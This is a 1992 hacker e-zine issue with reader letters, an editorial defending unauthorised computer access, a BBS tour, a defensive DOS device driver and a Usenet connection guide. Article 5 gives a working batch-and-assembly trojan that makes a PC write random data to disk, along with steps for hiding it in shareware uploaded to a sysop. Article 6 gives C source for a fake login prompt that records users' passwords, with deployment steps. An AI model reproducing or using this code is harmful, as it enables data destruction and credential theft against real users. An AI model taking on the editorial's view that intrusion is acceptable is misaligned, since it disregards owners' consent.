Copy Link
Add to Bookmark
Report

Digital Free Press Vol 1 Issue 2

eZine's profile picture
Published in 
Digital Free Press
 · 5 years ago

  


######### ############ #########
########### ############ ###########
#### #### #### #### ####
#### #### #### #### ####
#### #### ######## ###########
#### #### ######## #########
#### #### #### ####
#### #### #### ####
########### #### ####
######### #### ####

DIGITAL FREE PRESS
-------------------------------------------------------------------------------
Volume 1.0 Issue 2.0
-------------------------------------------------------------------------------

* A Publication of The Underground Computing Foundation (UCF) *

* Send Submissions to: hackers%underg@uunet.uu.net *

* Editor: Max Cray (max%underg@uunet.uu.net) *

* BBS: The Underground (401) 847-2603 (v.32) *

------------------------------------------------------------------------------

Statement of Purpose and Disclaimer

The Digital Free Press is an uncensored forum to document current
activities in and of the world of modern technology. It is published under the
premise that it is better to know, rather than not know, so no attempt is made
to hide any information no matter how dangerous it may be. Information is a
double edged sword. It is neither good nor bad, and can be used for either
good or bad. Warning: Some information in this document could be used for
illegal activities. Use at your own risk. Articles are the opinion of the
authors listed, and not of the editor (unless of course the editor wrote
it).

------------------------------------------------------------------------------
In this Issue:

1. Mail to Max
2. Editorial: Old 'Hackers' vs. New 'Hackers' - Max Cray
3. A Tour of The Underground Computing Foundation BBS - Max Cray
4. Protection of DOS Devices - GodNet Raider
5. Overwriting Trojan - The BBC
6. Breaches of Security - The Joker
7. Getting on Usenet - Max Cray
8. The BBC's Crash House (Fun with ANSI.SYS) - The BBC

------------------------------------------------------------------------------
Mail to Max:
------------------------------------------------------------------------------
Date: Tue, 31 Dec 91 23:49:32 -0500
From: <Irate Upstream Sysadmin>
X-Mailer: Mail User's Shell (7.2.2 4/12/91)
To: underg!ccn
Subject: digital free press

While investigating a problem with the mail and uucp queues on my system I
discovered a message from you entitled "DIGITAL FREE PRESS Volume 1 Issue 1".
The majority of this message gave details for activities that I consider to
be either illegal or primarily malicious in nature. As such, I refuse to
have my computer system be involved in any way in the distribution of this
material. I realize that some people, perhaps including yourself, might
construe this action as restricting the freedom of the press but rest
assured that this is not the case. I am in no way usurping your rights to
say anything that you want to say, I am only refusing to help pay for it.

I will phone your system one last time to deliver this letter and then I
will sever the uucp link. If you wish to discuss this matter with me you
may call me either at work during the day or at home in the evening.
If I do not hear from you within two weeks I will return the unused portion
of your $50.

--
<Irate Upstream Sysadmin>
%% Can I be excused, my brain is full. **
--
[Editor's note: Lesson here is be sure you know your upstream sysadmin's
policy on distribution of controversial material. I was able to get the uucp
connection back, but only after agreeing not to distribute DFP anymore
through his site.]
----------------------------------------------------------------------------
Date: Thu, 2 Jan 92 20:39:09 CST
From: <Irate Pseudo Hacker>
To: max@underg
Subject: Re: DIGITAL FREE PRESS Volume 1 Issue 1
Newsgroups: alt.hackers
Organization: :noitazinagrO

You obviously have no idea about what alt.hackers is about, to refresh your
memory, enclosed is a copy of an article you should have read earlier, but
knowing your type, probably didn't. please note that it EXPLICITLY states
that this is not a forum for elitoid DOS pirate dumbshit WEENIES who like to
call themselves "hackers". go back to WWIVnet or Celeritynet or whatever
pirate-net it is that people like you use nowadays, asshole.

[alt.hackers FAQ deleted]

P.S. Please do not post this type of material here again.
--
<Irate Pseudo Hacker>
--
[Editor's note: How can this person hope to influence people by being so
confrontational? In fact the response I got from the first issue of DFP was
about 90% positive, and there were many requests to be put on the mailing
list. Thanks for your support, and please keep the mail coming!]

------------------------------------------------------------------------------
------------------
| Article 2 of 8 | EDITORIAL
------------------
Real Hackers?

There is a lot of talk these days about how the word 'hacker' has been
redefined by the press. The theory is that the old hackers, as portrayed in
Steven Levy's excellent book _Hackers: Heroes of the Computer Revolution_,
were good and pure and this breed of hacker dramatized in the press is some
new evil non-hacker terrorist. This is nonsense.

According to the book, the hacker ethic(paraphrased) is as follows:

1. Access to computers should be unlimited and total.

2. All information should be free.

3. Mistrust Authority - Promote Decentralization.

4. Hackers should be judged by their hacking.

5. You can create art and beauty on a computer.

6. Computers can change your life for the better.

In pursuit of the hacker ethic these heroes performed various acts that
would not be looked upon favorably in today's anti-hacker society:

Used Equipment Without Authorization (Page 20)
----------------------------------------------

" So, without any authorization whatsoever, that is what Peter Sampson
set out to do, along with a few friends of his from an MIT organization
with a special interest in model railroading. It was a casual, unthinking
step into a science-fiction future, but that was typical of the way that
an odd subculture was pulling itself up by its bootstraps and growing to
underground prominence-to become a culture that would be the impolite,
unsanctioned soul of computerdom. It was among the first computer
hacker escapades of the Tech Model Railroad Club, or TMRC."


Phone Phreaked (Page 92)
------------------------

"He had programed some appropriate tones to come out of the speaker and
into the open receiver of the campus phone that sat in the Kluge room.
These tones made the phone system come to attention, so to speak, and
dance."


Modified Equipment Without Authorization (Page 96)
--------------------------------------------------

" Nelson thought that adding an 'add to memory' instruction would
improve the machine. It would take _months_, perhaps, to go through
channels to do it, and if he did it himself he would learn something
about the way the world worked. So one night Stewart Nelson spontaneously
convened the Midnight Computer Wiring Society."


Circumvented Password Systems (Page 417)
----------------------------------------

"Stallman broke the computer's encryption code and was able to get
to the protected file which held people's passwords. He started
sending people messages which would appear on screen when they
logged onto the system:

'I see you chose the password [such and such]. I suggest that
you switch to the password "
carriage return." It's much
easier to type, and also it stands up to the principle that
there should be no passwords.'

'Eventually I got to the point where a fifth of all the users on
the machine had the Empty String password.' RMS later boasted.
Then the computer science laboratory installed a more sophisticated
password system on its other computer. This one was not so easy for
Stallman to crack. But Stallman was able to study the encryption
program, and as he later said, 'I discovered changing one word in
that program would cause it to print out your password on the system
console as part of the message that you were logging in.' Since
the 'system console' was visible to anyone walking by, and its
messages could easily be accessed by any terminal, or even printed
out in hard copy, Stallman's change allowed any password to be
routinely disseminated by anyone who cared to know it. He thought
the result 'amusing.'

Certainly these hackers were not anarchists who wanted only to destroy.
They had a personal code of ethics, the hacker ethic to base their behavior
on. In fact the modern hacker has his/her ethics intact. Compare the above
hacker ethic with the hacker ethic found in _Out of the Inner Circle_ by
Bill 'The Cracker' Landreth, a teenager arrested by the FBI (Page 18,60):

1. Never delete any information you can not easily restore.

2. Never leave any names on a computer.

3. Always try to obtain your own information.

The common denominator to these ethics systems are the respect for
technology, and the personal growth through free access and freedom of
information. Certainly the attitude towards private property is the same.
Accessing and using equipment that you do not own is okay as long as
you do not prevent those who own it from using it, or damage anything.

With respect to the hacker ethic the hackers mentioned in _Cyberpunk:
Outlaws and Hackers on the Computer Frontier_ by Katie Hafner and John
Markoff were in fact good hackers. If free access, and free information
were the law of the land would Kevin Mitnick have gone to jail? I do not
think so. Sure he got the source code for VMS, but is there any evidence
that he used this information for personal gain, or did he simply use the
information to improve his understanding of the VMS operating system?

Robert T. Morris's worm program was a clever hack. Of course he 'gronked'
it by programming the replication rate much too fast, but still there is no
evidence that he had any intention of doing harm to the system. It was simply
a computer experiment. Who owns the Internet? Is it some mysterious 'them'
or is it our net? If it is out net, then we should be able to try some stuff
on it, and to heck with 'them' if they can't take a joke.

Of course the German hackers are a different story. What they got in
trouble for was espionage, and not hacking, which is a breach of faith,
and is hacking for personal gain. However selling Minix to the KGB almost
makes it forgivable...

It is my contention that hackers did not change. Society changed, and it
changed for the worse. The environment the early hackers were working in
correctly viewed these activities as the desire to utilize technology in a
personal way. By definition hackers believe in the free access to computers
and to the freedom of information. If you do not believe in these principles
you are not a hacker, no matter how technologically capable you are. You
are probable just a tool for the greed society. Current bad mouthing of
hackers is simply snobbery. Rather than cracking down on the modern hacker, we
should reinforce the hacker ethic, a code of conduct not based upon greed and
lust for the almighty dollar, but instead for personal growth through the free
access of computers and information, and a respect for technology.

It is the humane thing to do.

------------------------------------------------------------------------------
------------------
| Article 3 of 8 |
------------------

A Tour of the Underground Computing Foundation BBS
by Max Cray

I have noticed a lot of people call The UCF BBS and are unable to find
the good stuff, so let me take the opportunity to point out a few of the
high spots. First of all it is connected to the Usenet. Your international
e-mail address would be <username>%underg@uunet.uu.net. With this address
you can subscribe to all the good stuff like Phrack and NIA. There is also
a mailing list: hackers%underg@uunet.uu.net. E-mail me if you want to be
included on the list.
You can participate in the Usenet newsgroups, of which alt-cud-digest
is a must. alt.dcom.telecom is an outstanding resource for those interested
in the telephone network. There is vast amounts of very technical information
that passes through on a daily basis. Far too much to read it all. Type
USENET at the prompt to see all the newsgroups. Type in the name of the group
you want, and then type the READ command. Type the number of the first
message you want to read. If you call often you will want to configure your
NEW message scan using the JOIN command. Type ? at the prompt to get help.
There is a more local network set up, which has a newsgroup called ri.cug.
This is the Rhode Island Computer Underground, and it contains info on the
local scene around here.
If you are interested in journals type INFO. I try to keep the latest
issues of NIA, PHRACK, CUD, EFFector, and other journals here. If you are
interested in back issues go into the files section and LOG into the directory
/public/text. You can view or download text philes here. There is also some
stuff of interest in the /public/hacks directory. The /public/comm directory
contains subdirectories for the WAFFLE philes, and UUPC philes that you may
need to connect to the UUCP network.
Sorry there are no codez as it is an information board and not a pirate
board.

------------------------------------------------------------------------------
------------------
| Article 4 of 8 |
------------------
-=[ Protection of DOS devices ]=-

-or-

/*******************************************/
/* Unarc, Unzip, Lha extract, and be merry */
/* for tomorrow we may lock. */
/*******************************************/

- written by -
GodNet Raider
- of -
The CyberUnderground

-=[ "
Information is the greatest weapon of power to the modern wizard." ]=-

]----------------------------------------------------------------------------[

Introduction:
-------------

This phile is written in response to the practice of misusing using
MS-DOS devices (ie.. to make archive bombs). The following will explain the
problem and some of the possible solutions. Also included is an ASM source
that will remap the 'CLOCK$' device to a 'NUL' (basic bit bucket) type
device.

The problem:
------------

In a never ending attempt of OS designers to mask the inner workings
of system hardware, the idea of device drivers comes into play. A device
driver is basically an attempt to standardize I/O with the systems' hardware.
Thus allowing access to every thing from keyboards to CD ROMS without an
in depth knowledge of the physical hardware involved.

This ideal is valid and of great help in program development, yet when
the drivers are not well defined there is the tendency for them to cause
more harm then good. A case in point is the 'CLOCK$' device in MS-DOS.

'CLOCK$' is a driver designed to allow updating of the CMOS clock.
It passes data direct to the CMOS clock with out buffering or any attempt
at error checking. Thereby passing valid data as well as invalid. An with
no internal mechanism to detect an overflow condition/not sending EOF after
a read will tend to hang systems/knock out the date and time stored in the
CMOS clock. This problem has come of use to the hacker community.

Several methods of the assault have been:

1) Uploading 'CLOCK$.*' files to remote systems.

2) Using BBS archiveing utilities to create 'CLOCK$.*'
files for download.

3) Low level disk editing of archive files to rename files
in it to 'CLOCK$.*'

Some possible solutions:
------------------------

Of the solutions available none are complete. There are benefits and
disadvantages to each. Nor is the following a complete list, it is only
an attempt to discus some of the common ones.

Abstinence:
Not excepting/expanding archive files on ones system. This is
the most undesirable but most effective and is only listed
'for abstinence makes the heart grow fonder'.

Scanning archives:
Most archive programs come with a utility to view the files
stored in a given archive (lha v foobar.lzh). The only real
drawback is having to take the time to scan archives. This
does not protect from BBS's that create real time archives,
extract to check for virus batches (with out looking thought
the archive first), uploads of 'CLOCK$.*' files, and programs
that create and write to a 'CLOCK$.*' file.

Updating programs:
Getting new versions of programs that watch for 'CLOCK$.*' and
avoid creating/writing to said file is a problem in that you
must wait for the author to come up with the fix and have to
pay for the update. Another reason for software makers to
release code with their programs.

TSR protection programs:
Other than yet another drain on precious RAM and clock time.
Can only protect from programs that create files though
interrupts. Pipes and redirects may slip though the cracks.

LOW LEVEL disk editing of io.sys files:
Renaming the 'CLOCK$' device is a method that will protect on
all levels but may cause some programs to hang that use it.
Also to replace it is not easy for you must reedit the file
(without moving it). It should also be noted that the new name
MUST be the same size as the original (6 letters).

Creation of a new 'CLOCK$' device:
This offers the protection of the above method with out the
need of changing OS binary files and to allow/disallow the
ORIGINAL 'CLOCK$' device by editing the config.sys file
instead. One disadvantage is that update of the CMOS clock
though 'CLOCK$' is stoped. Yet the BIOS clock is still
accessible and the CMOS clock can be updated though the BIOS
setup routine or programs that write direct to CMOS. Source
for a simple null mask clock device driver is provided below
and can be use as a template to create your own 'CLOCK$'
replacement.

There are other solutions to this problem not listed here.

Clock$ null device Source Code:
-------------------------------

The following ASM code is for a DOS device driver that will replace
the existing 'CLOCK$' device when added to the config.sys file
(device=outclock.sys).

The key points of the device are:

1) The line - DW 8080h. This tells the device loader that
outclock wishes to replace the present clock device
with it's self. This will trap all internal calls and
to redirect any calls to the new driver.

2) The line - DB 'CLOCK$ '. This will setup the device
to trap external access though pipes, indirects, file
I/O, and IOCTL's.

3) The device strategy is to simply ignore all incoming
commands to the device (standard practice for the
'NUL' device).

This driver does not prevent access to the CMOS clock except though
the CLOCK$ device. So it will not effect the running of programs EXCEPT
those that try to update the CMOS clock though the this device.

+---- Cut Here ----+---- Cut Here ----+---- Cut Here ----+---- Cut Here ---+

CSEG segment public 'CODE'
org 0
assume CS:CSEG, DS:CSEG, ES:CSEG
DEVICE proc far
DD 0ffffffffh ;------------------------------;
DW 8080h ; The following 5 definitions ;
DW DEV_STRATEGY ; 18 (bytes) MUST be at offset ;
DW DEV_INTERRUPT ; 0 in the binary file. ;
DB 'CLOCK$ ' ;------------------------------;
KEEP_ES DW ?
KEEP_BX DW ?
FUNCTIONS label word
DW INIT
DW CHK_MEDIA
DW MAKE_BPB
DW IOCTL_IN
DW INPUT_DATA
DW NONDSTRCT_IN
DW INPUT_STATUS
DW CLEAR_INPUT
DW OUTPUT_DATA
DW OUTPUT_VERIFY
DW OUTPUT_STATUS
DW CLEAR_OUTPUT
DW IOCTL_OUT

DEV_STRATEGY:
mov CS:KEEP_ES, ES
mov CS:KEEP_BX, BX
ret

DEV_INTERRUPT:
push ES
push DS
push AX
push BX
push CX
push DX
push SI
push DI
push BP
mov AX, CS:KEEP_ES
mov ES, AX
mov BX, CS:KEEP_BX
mov ES:word ptr [BX] + 3, 0000h
mov AL, ES:[BX] + 2
shl AL, 1
xor AH, AH
lea DI, FUNCTIONS
add DI, AX
jmp word ptr [DI]

INIT:
lea AX, E_O_P
mov ES:word ptr [BX] + 14, AX
mov ES:word ptr [BX] + 16, CS
jmp short QUIT

INPUT_STATUS:
KEY_READY:
NONDSTRCT_IN:
INPUT_DATA:
OUTPUT_DATA:
OUTPUT_VERIFY:
CHK_MEDIA:
MAKE_BPB:
IOCTL_IN:
IOCTL_OUT:
OUTPUT_STATUS:
CLEAR_OUTPUT:
CLEAR_INPUT:
QUIT:
or ES:word ptr [BX] + 3, 0100h
pop BP
pop DI
pop SI
pop DX
pop CX
pop BX
pop AX
pop DS
pop ES
ret
E_O_P:
DEVICE endp
CSEG ends
end DEVICE

+---- Cut Here ----+---- Cut Here ----+---- Cut Here ----+---- Cut Here ---+

]============================================================================[

underg!tsf!gnr@uunet.uu.net (GodNet Raider)
-=[ "
You gotta learn to listen, before you learn to play." ]=-

------------------------------------------------------------------------------
------------------
| Article 5 of 8 |
------------------

To: hackers@underg.UUCP
Subject: Text phile 2
From: bbc@tsf.UUCP (The BBC)
Organization: The CyberUnderground

Welcome class... An now... for another lesson in the misuse of
computers...

So you thought that INJECT.BAT was fun... But you did not like
the idea of making the injection give the fun away by causing the
host program to crash after the trojan ran... Well then lets get a
little more sophisticated then... Now rather than overwriting the
existing host code lets just... Oooooh... Say... Add a new function
to an existing program... Now what to add... Something
destructive???? Why not...

Ok How about a bit o' code that just moves the absolute disk
write interrupt to the clock interrupt... Then each time the clock
ticks (about 18 times a second) the computer attempts a disk write
with random data... Good way to test THOSE ol' ALT-CTRL-DEL
reflexes... Oooooh... What fun, it is to crash, in a one drive
nonbacked-up system...

Well now for the fun part...

Step 1:

Make a batch file called "
ADDON.BAT" an in it place
the following commands -

=============================================================
echo off
cls
rename %2 ~~temp2.~tp > nul
copy %1+~~temp2.~tp %2 /b > nul
erase ~~temp2.~tp > nul
=============================================================

Step 2:

Make a ASM file called "
TROJAN.ASM" an in it place the
following -

=============================================================
PROGSEG segment para public 'CODE'
assume CS:PROGSEG
DOIT proc
wSaveDS dw 9090h ; Store old DS register here...
mov AX, DS
mov CS:wSaveDS, AX ; Save DS address for hosts'
; use...

;-------------- v Place Trojan Here v -------------;

mov AX, 3526h ; Get DOS absolute write interrupt...
int 21h
mov DX, BX ; Set clock interrupt to returned
; value...
mov AX, ES
mov DS, AX
mov AX, 2508h
int 21h
xor BX, BX ; Rezap used registers [other than
; AX/DS/ES]...
xor CX, CX
xor DX, DX

;--------------- ^ Place Trojan Here ^ ------------;

mov AX, CS:wSaveDS ; Restore DS, ES registers for
; host...
mov DS, AX
mov ES, AX
xor AX, AX
DOIT endp ; Host will start after this
; point...
PROGSEG ends
end
=============================================================

Step 3:

Then assemble and link the trojan file. Use exe2bin [or
whatever utility you have to convert .EXEs to .COM format]
to make a .COM file out of TROJAN.EXE.....

Step 4:

Then copy a *.COM file into the same directory. Should
be part of some shareware thing that the target sysop would
like. With docs an all... would not want them to get
suspicious, now would we.............

Step 5:

Run the following command from the dos prompt...

ADDON <Trojan file> <COM file to add trojan to>

Step 6:

Upload the mess to the unsuspecting sysop and watch the fun!


See and you thought hacking was hard...... Of course if they
get smug and start searching for the added code.... We'll just have
to add extra code (nops' ect) and/or switching some of the code
around in the ASM file...

'Another fine mess' from...
The BBC

---------------------------------------------------------------------
...uunet!rayssd!galaxia!underg!tsf!bbc (The BBC)
-=[ "
Anarchy is never HAVING to say you're sorry." ]=-

------------------------------------------------------------------------------
------------------
| Article 6 of 8 |
------------------

Breaches of Security
by
The Joker
----------------------

Hello loves, Here we are with yet another page from the _Tomb of
Ultimate Evil_ (THOSE of good aliment must make a saving throw against
neophytedom).

Todays chat is on the subject of collecting passwords, not that anyone
here would have nothing but nobel reasons to do such a thing. An in
this wonderfully wacky world of networks, UNIX, and VMS it's just the in
t'ing to do. So now boys and girls, hacks and hacketts, Rocky and
bullwinkel let us begin.

Ah, what a tangled web we weave when first we practice to deceive...
Yet how easy it makes it to get what we want. An deception is the key
here. For thanks to the simple format of most logins (name, password...
rank, serial number, underwear condition...). The simplicity of the answer
makes it a wonderful little exercise in shell programming.

What is needed is a simple program that pretends it's a login shell
and is set like a little program beartrap. Sitting quietly, waiting
for that most elusive of pray... The north american password! (An them's
good eating too). So as we send our assistant into the system to wrestle
and subdue the foul beasty, let us listen to a message from the good folks
at Mutual of Omaha... Ooop sorry, instead let us look at a model of a simple
password capture shell. What? You want the insurance commercial instead...
Well, tough cookies.

|------------------------------[ Cut Line ]----------------------------------|

/*
LogTrap.c
(c) 1992 by Joculator inc., no rights reserved (or respected).
Rubber cell #182
Arkham Asylum
Gotham City

Captures first login attempt by a user, to file (*szKeepFile),
then give phony error (*szPhonyError) and call real login shell
(*aszRealShell []). For the express purpose of promoting glorious
world chaos.
*/

#include <stdio.h>
#include <stdlib.h>
#include <process.h>

#define TRUE 1
#define MAX_BUFFER 256
#define ECHO 0
#define NOECHO 1
#define NEWLINE "
\n"
#define ANSI_CLS "
\x1b[2J"
#define ANSI_NOECHO "
\x1b[8m \x1b[40D"
#define ANSI_ECHO "
\x1b[0m"

struct
{
char
*szPrompt,
fNoEcho;
} *ptPrompts,
Prompts [] = /* Prompts patterned after real login shell. */
{
/* [Prompt string], [ECHO | NOECHO] */
"
Login: " , ECHO,
"
Password: " , NOECHO,
NULL
};

char
*szPhonyError = "
Invalid login.\n", /* Error patterned after LOGIN. */
*aszRealShell [] = /* Command to call real LOGIN. */
{
"
LOGIN",
/* list parameters (if any) here */
NULL
},
*szKeepFile = "
~tmp0167.tmp", /* Save booty in... */
szWorkBuffer [MAX_BUFFER];

void
main (void);

void main (void)
{
FILE
*OutStream;

/* Cover our tracks. */
printf (ANSI_CLS);
/* Prompt for and save user information. */
for (ptPrompts = Prompts; ptPrompts->szPrompt; ptPrompts++)
{
printf (ptPrompts->szPrompt);
if (ptPrompts->fNoEcho)
printf (ANSI_NOECHO);
fgets (szWorkBuffer, MAX_BUFFER, stdin);
if (ptPrompts->fNoEcho)
printf (ANSI_ECHO);
/* If file error, ignore it but, don't try to write to file. */
if (OutStream = fopen (szKeepFile, "
a"))
{
fputs (ptPrompts->szPrompt, OutStream);
fputs (szWorkBuffer, OutStream);
}
fclose (OutStream);
}
/* Stick tongue out, Naaaa... */
printf (szPhonyError);
/* Commit process suicide by running LOGIN shell on top of our process. */
/* It should not return (unlike a bad check). */
execvp (aszRealShell [0], &aszRealShell [1]);
/* if execvp () (it got to this point?), lock system. */
while (TRUE);
}

|------------------------------[ Cut Line ]----------------------------------|

So there you have it. Now all that is left to do is:

1: Set Prompts [], *szPhonyError, and *aszRealShell [] to match the
LOGIN of the target system.

2: Set *szKeepFile to where you want your ill gotten booty to go.

3: Compile the whole mess.

4: LOGIN to the target system and run the program. For more fun
place copies on more than one terminal, if possible, on the same
system.

5: Run to your duck blind and wait for a user to spring your lil'
trap.

That's it, have fun, And remember...
If someone offers you drugs, just say... Yo!

----------------------------------------------------------------------

...uunet!rayssd!galaxia!underg!tsf!joker (The Joker)
-=[ "
All it takes is one bad day, then maddness has its way." ]=-

------------------------------------------------------------------------------
------------------
| Article 7 of 8 |
------------------

Getting on Usenet
by Max Cray

Much of the information from this phile comes from the excellent text
phile INTRO.DOC that comes with the Waffle BBS package. Other information
was gained from various books, and postings on the net itself, especially
the FAQs (Frequently Asked Questions) postings in news.answers, and also my
personal experience.

Before you actually connect your machine to Usenet, it may be easier
for you to learn about Usenet, and what it can do for you, by calling a
BBS that is connected to Usenet. Good choices would be my own Underground,
or any of the systems listed in the *nixpub. This is a document regularly
posted to the Usenet listing all known unix bbs systems. You can get a copy
of this from my bbs or from the following sources:

o anonymous uucp from jabber.
+1 215 348 9727 [Telebit access]
LOGIN: nuucp NO PWD [no rmail permitted]
this list: /usr/spool/uucppublic/nixpub.short
long list: /usr/spool/uucppublic/nixpub
o "
*NIX Depot" BBS on jabber.
o USENET, regular posts to:
comp.misc
alt.bbs
o the nixpub electronic mailing list.
to be included or deleted from this distribution,
send mail to nixpub-list-request@ls.com.
o anonymous ftp from GVL.Unisys.COM [128.126.220.102]
under ~/pub/nixpub/{long,short}
o archive server from cs.widener.edu.
mail to archive-server@cs.widener.edu
Subject: or body of
send nixpub long
or
send nixpub short
or
send nixpub long short
or even
index nixpub

I will talk more about anonymous uucp, mailing lists, and archive servers
in a minute.

UUCP SOFTWARE

The first thing you need to connect your machine to the Usenet is
software, and the first choice would be a version of the unix operating system
itself. In fact to get a copy of the real thing is not that expensive anymore.
As of this writing Consensys Corporation (1301 Pat Booker Rd., Universal City,
TX, 78148, 1-800-387-8951) has UNIX System V Release 4 (the latest) including
C development, Networking, and X Windows, for 386+ systems for $495. Certainly
a big chunk of change, but a great deal for what you get. If cost is important
you might try Coherent by Mark Williams Company (60 Revere Dr., Northbrook,
IL. 60062, 1-800-627-5967). This is a less robust unix clone os that should
run on any pc compatible computer. The price is right at $100. If you just
want uucp connectivity, but you don't want to switch to a real operating
system, then you might want to check out the Waffle BBS package. It can be
found at SIMTEL, UUNET, or also can be gotten from the source: darkside.com
BBS at 1-408-245-SPAM (e-mail: dell@vox.darkside.com), or from The Underground
BBS. The package does not need to be run as a bbs, but can also be run as a
personal system, and it is shareware. If you want freeware, then you might be
interested in UUPC which can also be gotten from SIMTEL, UUNET, or from my
bbs. Source code is available.

Once you have software, read and re-read the docs. Get a friend to connect
with you and learn how to use your software before you bother a sysadmin with
connecting to Usenet proper.

CONNECTING TO USENET

And now the hard part: you need to find someone to feed you. Mail feeds
are usually not too difficult, but newsfeeds are harder to come by as they
take more resources from the host machine than mail feeds due to the much
larger volume of information. Possible sources of feeds include:

- Systems on the previously mentioned *nixpub listing.
- Local colleges or universities.
- Systems found scanning the uucp maps.

These can be gotten using anonymous uucp from UUNET, or also from
the mail server at MIT. You can request an index of the maps by
sending email to 'mail-server@pit-manager.mit.edu' with this message:

path <your-site@address>
send usenet/comp.mail.maps/index
quit

You can get help for this mail server by replacing the 'send' line
with just 'help'. You can see how being on the net already helps you
to get your machine on the net. The uucp maps are also an excellent
hackers tool as they list the sites in your area, points of contact,
and how they connect up to each other (at least for uucp connections).

I believe older copies of the uucp maps can be found in the TELECOM
or UNIX forums on Compuserve.

- Pay services.

Here are some of the providers:

o Anterior Technology
P.O. Box 1206
Menlo Park, CA 94026-1206
Voice: (415) 328-5615
info@fernwood.mpk.ca.us
(UUCP, connectivity, name service, MX forwarding, news feeds)

o CERFnet
P.O. Box 85608
San Diego, CA 92186-9784
Voice: (800) 876-CERF
help@cerf.net
(connectivity, name service, MX forwarding, news feeds)

o Colorado SuperNet, Inc.
Attn: David C. Menges
Colorado School of Mines
1500 Illinois
Golden, CO 80401
Voice: 303-273-3471
dcm@csn.org
(UUCP, news feeds)

o MSEN, Inc.
628 Brooks Street
Ann Arbor, MI 48103
Voice: (313) 741-1120
info@msen.com
(UUCP, connectivity, name service, MX forwarding, news feeds)

o MV Communications, Inc.
P.O. Box 4963
Manchester, NH 03108-4963
Voice: (603) 429-2223
Data: (603) 429-1735 (log in as "
info" or "rates")
info@mv.mv.com
(UUCP, name service, MX forwarding, news feeds)

o NEARnet
Attn: John Curran
BBN Systems and Technologies
MS 6/3B
10 Moulton Street
Cambridge, MA 02138
Voice: (617) 873-8730
jcurran@nic.near.net
(connectivity, name service, MX forwarding, news feeds (for
NEARnet sites))

o Netcom - Online Communication Services
P.O. Box 20774
San Jose, CA 95160
Voice: (408) 554-8649
bobr@netcom.com
(UUCP, connectivity, name service, MX forwarding, news feeds)

o SURAnet
8400 Baltimore Blvd.
College Park, MD 20742
Voice: (301) 982-3214
news-admin@sura.net
(connectivity, name service (for SURAnet sites), news feeds (for
SURAnet sites))

o UUNET Canada, Inc.
1 Yonge St., Suite 1801
Toronto, Ontario
Canada M5E 1W7
Voice: (416) 368-6621
info@uunet.ca or uunet-ca@uunet.uu.net
(UUCP, connectivity, name service, MX forwarding, news feeds)

o UUNET Technologies Inc.
3110 Fairview Park Drive, Suite 570
Falls Church, VA 22042
Voice: (703) 876-5050
info@uunet.uu.net
AlterNet (network connectivity) info: alternet-info@uunet.uu.net
(UUCP, connectivity, name service, MX forwarding, news feeds)

o UUNORTH, Inc.
Box 445, Station E
Toronto, Ontario
Canada M6H 4E3
Voice: (416) 537-4930 or (416) 225-UNIX

o Performance Systems International, Inc.
11800 Sunrise Valley Drive, Suite 1100
Reston, VA 22091
Voice: (703) 620-6651 or (800) 827-7482
Computerized info: all-info@psi.com
Human-based info: info@psi.com
(UUCP, connectivity, name service, MX forwarding, news feeds)

SUBMIT A UUCP MAP ENTRY

All machines connecting to the UUCP network should submit
a UUCP map to the map coordinator, <uucpmap@rutgers.edu>. The
purpose of these maps is to facilitate finding the fastest
path between any two systems, and also to prevent duplicate
names that would cause mail to be lost.

Maps are posted to comp.mail.maps newsgroup on a fairly
regular basis. In addition to the maps, there is a README file
that documents these details in much more detail -- the
information here is not enough to construct a full map entry.

You should obtain this README file from one of your neighbors;
it is also available on the waffle BBS system +1 408 245 SPAM (as
the file /public/waffle/uucp-map.txt), or it can be found in the
/public/text/misc directory on The Underground BBS.

The basic format of the maps consists of a number of lines
with a # and a letter, followed by a tab and then information
corresponding to that letter:

#N UUCP name of site
#S manufacturer machine model; operating system & version
#O organization name
#C contact person's name
#E contact person's electronic mail address
#T contact person's telephone number
#P organization's address
#L latitude / longitude
#R remarks
#U netnews neighbors
#W who last edited the entry ; date edited
#
sitename .domain
sitename remote1(FREQUENCY), remote2(FREQUENCY),
remote3(FREQUENCY)

ARCHIVE SERVERS

There are many archive servers. These systems provide files via e-mail.
For example the pit-manager mail server at MIT mentioned above is one. You
can get back issues of the Computer Underground Digest from the University
of Chicago archive server. To use the U. of Chicago email server, send mail
with the subject "
help" (without the quotes) to:

archive-server@chsun1.spc.uchicago.edu.

There are many more archive servers. You can also get binaries using a
pair of utilities called uuencode, and uudecode. These utilities convert
binary code to ascii text code suitable for transmission via e-mail (or to be
posted on when of the many .binaries newsgroups on Usenet.

MAILING LISTS

Once you have an e-mail account you can join mailing lists. These can be
the electronic equivalent of the newsletters, or they can echo mail to
multiple destinations. For example you mail a certain mail list, and copies
will be echoed to all who are on the list. For example you can sign up for
the Phrack electronic P/H newsletter by:

1. Send a piece of electronic mail to "
LISTSERV@STORMKING.COM". The mail
must be sent from the account where you wish Phrack to be delivered.

2. Leave the "
Subject:" field of that letter empty.

3. The first line of your mail message should read:
SUBSCRIBE PHRACK <your name here>

4. DO NOT leave your address in the name field!
(This field is for PHRACK STAFF use only, so please use a full name)

Sign up for the NIA newsletter by sending mail to: nia@nuchat.sccsi.com.

Incidentally, you do not have to be part of the Usenet, ot the Internet
(the TCP/IP network), to participate. See the excellent article in NIA73
about e-mail gateways between networks "
Internet to Anywhere" by Industrial
Phreak.

I should also mention that with a mail account, you can still post to
a Usenet newsgroup. Send mail to <newsgroup>@ucbvax.berkeley.edu. For
newsgroup you want to change any periods to dashes. For example,
alt-bbs@ucbvax.berkley.edu to post to the alt.bbs newsgroup. If you desire
a response to your posting be sure to put in a line like: Please e-mail all
replies.

USING UUCP TO TRANSFER FILES

The uucp program allows files to be transmitted to and from
any neighboring system, via the command line.

To "
push" a file from the local machine to the remote machine:

uucp filename.here unix!~/filename.there

To "
pull" a file into a machine off the remote machine:

uucp unix!~/filename.there filename.here

unix is used here as the name of the remote machine.

For example you can connect to the uunet machine directly via
a 1-900 number, and get access to a wealth of source code and
information about the network. Call 1-900-468-7727 and use the login
"
uucp" with no password. Callers are charged 50 cents per minute.
The charges appear on your phone bill.

The file uunet!~/help contains instructions. The file
uunet!~/ls-lR.Z contains a complete list of the files available
and is updated daily. Files ending in Z need to be uncompressed
before being used. The file uunet!~/compress.tar is a tar
archive containing the C sources for the uncompress program.

1. How to reach UUNET's 900 number via uucp

Here are some sample a L.sys or Systems file lines suitable for
UUNET's 900 number:

# Simple line.
uunet Any ACU 19200 1-900-468-7727 in:--in:--in: uucp
#
# Set up for a Telebit.
uunet Any cua0 19200 cua0 "" ATX0S50=255S111=30DT19004687727\r CONNECT ""
login: uucp

